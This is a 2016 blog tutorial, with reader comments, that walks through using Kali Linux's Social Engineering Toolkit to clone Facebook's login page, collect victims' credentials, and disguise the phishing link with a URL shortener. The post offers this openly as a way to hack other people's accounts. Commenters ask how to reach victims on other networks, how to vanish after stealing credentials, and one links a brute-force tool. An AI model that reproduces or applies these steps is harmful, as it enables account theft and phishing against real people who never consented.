Saturday, August 13, 2016

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.




WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.


LET'S DO THIS!!!!!!!!!

Follow this video..........



STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com

    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 


More Detailed Guides

If there's something that isn't clear then there's a 3 post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvestor attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extent attack outside your LAN

25 comments:

  1. completed all the steps, not able to get details in harvester file

    ReplyDelete
    Replies
    1. It only works when you are in the Same Local Netwok -.-

      Delete
  2. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
  3. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
    Replies
    1. your using a usb for your wifi?
      Kali linux doesn't pickup your onboard network card if your using a VM box

      Delete
    2. sudo ifconfig

      Delete
    3. You really shouldn't be using a VM to do network related stuff. Either run a live CD/USB/whatever or install Kali.

      Delete
  4. But this only works for people on the same network, correct?

    ReplyDelete
    Replies
    1. Redirect the 80 port to your machine

      Delete
  5. The url doesn't work for me the next day. Could someone Help me pls

    ReplyDelete
  6. How do i stop this (apache etc) after snatching the credentials and want to disappear?

    ReplyDelete
  7. after i did all steps the site cant be reached

    ReplyDelete
  8. It would be great if u make a tutorial on hacking instagram :p.

    ReplyDelete
  9. Article is nice and working for me.for hacking facebook using brute force attack follow below link it may hack every facebook account

    http://www.kalilinuxdojo.com/2015/11/hack-facebook-using-python-script-via-brute-force-attack.html

    ReplyDelete
  10. what's mean "Shorten your ip address with tinyurl.com ". please. explain clearly?

    ReplyDelete
    Replies
    1. Shorten means nothing but hiding your IP behind an URL!

      Delete
  11. How do you use it on people without them being on the same network?

    ReplyDelete
  12. Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
  13. MY IP VERSION IS6 AND TINYURL IS MAKING TROUBLE

    ReplyDelete
  14. getting this error how to fix it- Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
  15. hack into public hot spot then get fb credentials

    ReplyDelete
  16. the website thus created for fishing only works in the same computer from where the process is done.if i send that fishing page to any others mail it doesnt open up. can u help me hacking a persons id who a state away?

    ReplyDelete
  17. How to shorten the IP to tiny URL?pls help me

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC